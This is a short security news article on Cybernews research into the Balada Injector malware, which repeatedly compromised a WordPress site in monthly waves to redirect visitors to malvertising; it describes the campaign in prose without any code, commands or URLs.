The Balada Injector malware is alive and well, compromising poorly secured WordPress websites across the internet, as well as using them to target visitors, new research has found.
a report of Cybernews researchers claim to have found a compromised WordPress website during a “routine web monitoring operation”.
The compromised website was apparently targeted by the Balada Injector malware – a Linux-based backdoor used to infiltrate websites through common or otherwise known vulnerabilities in WordPress plugins, themes, and similar vulnerabilities. The Balada Injector is known for attacking in “waves” – every month or so the injector would use a new domain name and code, which it would attempt to add to the WordPress site’s code.
Waves of attacks
Seven different instances of malicious code have been added to this particular site and stacked on top of each other. That means the website has endured seven “waves” of hacking attacks. This code, which was added at the very top of the page and was supposed to run before the website was loaded, was intended to allow the attackers to access infected machines remotely and redirect visitors to various websites where malvertising campaigns were running.
When the researchers dissected and examined some of the PHP payloads found on the compromised website, they discovered URLs of newly spawned Command & Control (C2) endpoints and subsequent obfuscated JavaScript files used in the operations scheme. According to the researchers, a total of five URLs were used to load malicious JavaScript on exploited websites.
The good news for potential victims is that the Balada injector is still not as advanced as it could be. It doesn’t check whether compromised websites have previously added malicious code, which is why the website forced the download of a PHP file instead of displaying the landing page, which raised red flags among the researchers and at the end of the day, helped uncover the hacking campaign.